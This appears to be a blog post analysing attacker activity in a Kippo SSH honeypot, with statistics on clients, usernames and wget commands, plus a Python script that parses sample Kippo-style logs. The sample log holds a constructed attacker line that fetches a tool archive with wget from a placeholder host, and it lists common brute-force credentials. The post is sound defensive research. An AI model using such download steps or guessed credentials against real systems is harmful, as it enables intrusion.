An SSH server allows remote control of, and access to, a system. In this article I present my analysis of the files and activities captured from attackers trapped in our SSH honeypot.
Here I will also post several videos (screen playbacks) of the attackers' activity in my honeypot.
A few months back I launched my project “Capturing Malware with Honeypot on Unifi” (https://wnnsnn.wordpress.com/2012/09/19/malware-honeypot-on-unifi-dionaea/).
Basically this project is something I am interested in, and I am able to publish my findings to the public.
An SSH server is a software program that uses the Secure Shell protocol to accept connections from remote computers. SFTP/SCP file transfers and remote terminal sessions are the most common use cases for an SSH server.
SSH servers are used widely by the private sector and government; for example, SSH servers are deployed on DNS servers, mail servers and most Linux and UNIX servers.
I would like to start this post with the statistics and results I obtained from my honeypot.
Top 10 SSH clients
This vertical bar chart displays the top 10 SSH clients used by attackers during their attacks, with the total number of detected attempts for each.
Top 10 usernames
This vertical bar chart displays the top 10 usernames that attackers tried when attacking the system.
Playback screen – watch this:
This video shows the attacker's activity after they managed to guess a password on my running Kippo instance.
Playback screen – from the log file – the attacker deleting history and log files.
In this video you will find a few methods and commands executed by the attacker to remove and hide the traces of their activity.
From log file – wget commands
The following table displays the latest “wget” commands entered by attackers in the honeypot system.
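The three statistics above (top SSH clients, top usernames, and the list of wget commands) all come from the same Kippo text log. As an added example that is not part of the original post and not Kippo's own code, the script below parses constructed, Kippo-style log lines and produces those three reports. The log line layout (`[HoneyPotTransport,<n>,<ip>]` transport prefix, `Remote SSH version:`, `login attempt [user/pass] failed|succeeded`, `CMD:`) is assumed from memory of Kippo's output and may differ between versions; the sample IPs and URL are documentation/placeholder values, not real captures.

```python
import re
from collections import Counter

# Constructed sample lines in the style of Kippo's text log. These are NOT real
# captures; the field layout is an assumption and may vary between Kippo versions.
SAMPLE_LOG = """\
2012-10-01 10:02:11+0800 [HoneyPotTransport,0,198.51.100.7] Remote SSH version: SSH-2.0-libssh-0.1
2012-10-01 10:02:12+0800 [SSHService ssh-userauth on HoneyPotTransport,0,198.51.100.7] login attempt [root/123456] failed
2012-10-01 10:02:13+0800 [SSHService ssh-userauth on HoneyPotTransport,0,198.51.100.7] login attempt [root/password] failed
2012-10-01 10:02:14+0800 [SSHService ssh-userauth on HoneyPotTransport,0,198.51.100.7] login attempt [admin/admin] failed
2012-10-01 10:05:40+0800 [HoneyPotTransport,1,203.0.113.9] Remote SSH version: SSH-2.0-PuTTY_Release_0.62
2012-10-01 10:05:41+0800 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.9] login attempt [root/toor] succeeded
2012-10-01 10:06:02+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.9] CMD: wget http://example.invalid/tools.tgz
2012-10-01 10:06:30+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.9] CMD: ls -la
2012-10-01 11:20:05+0800 [HoneyPotTransport,2,192.0.2.44] Remote SSH version: SSH-2.0-libssh-0.1
2012-10-01 11:20:06+0800 [SSHService ssh-userauth on HoneyPotTransport,2,192.0.2.44] login attempt [test/test] failed
2012-10-01 11:20:07+0800 [SSHService ssh-userauth on HoneyPotTransport,2,192.0.2.44] login attempt [root/root] failed
"""

# Every line carries a timestamp and the source IP inside the bracketed
# "HoneyPotTransport,<n>,<ip>" identifier; the rest of the line is the message.
PREFIX_RE = re.compile(r"^(\S+ \S+) \[.*?HoneyPotTransport,\d+,([\d.]+)\] (.*)$")
VERSION_RE = re.compile(r"^Remote SSH version: (\S+)")
LOGIN_RE = re.compile(r"^login attempt \[([^/]+)/(.*)\] (failed|succeeded)$")
CMD_RE = re.compile(r"^CMD: (.*)$")


def parse_line(line):
    """Split one Kippo-style line into (timestamp, source_ip, message); None if it does not match."""
    m = PREFIX_RE.match(line.strip())
    if not m:
        return None
    return m.group(1), m.group(2), m.group(3)


def _messages(log_text):
    """Yield (timestamp, ip, message) for every parseable line, skipping the rest."""
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            yield parsed


def top_clients(log_text, n=10):
    """Count client version banners (one per connection), most common first."""
    counts = Counter()
    for _, _, msg in _messages(log_text):
        m = VERSION_RE.match(msg)
        if m:
            counts[m.group(1)] += 1
    return counts.most_common(n)


def top_usernames(log_text, n=10):
    """Count usernames over all login attempts, whether they failed or succeeded."""
    counts = Counter()
    for _, _, msg in _messages(log_text):
        m = LOGIN_RE.match(msg)
        if m:
            counts[m.group(1)] += 1
    return counts.most_common(n)


def wget_commands(log_text):
    """Return (timestamp, source_ip, command) for each shell command that starts with wget."""
    found = []
    for ts, ip, msg in _messages(log_text):
        m = CMD_RE.match(msg)
        if m and m.group(1).lstrip().startswith("wget "):
            found.append((ts, ip, m.group(1).strip()))
    return found


if __name__ == "__main__":
    print("Top SSH clients:", top_clients(SAMPLE_LOG))
    print("Top usernames:", top_usernames(SAMPLE_LOG))
    for ts, ip, cmd in wget_commands(SAMPLE_LOG):
        print(ts, ip, cmd)
```

Point the functions at the contents of a real Kippo log file instead of `SAMPLE_LOG` to reproduce the charts and the wget table; the only part you may need to adjust is the regular expressions, if your Kippo version formats lines differently.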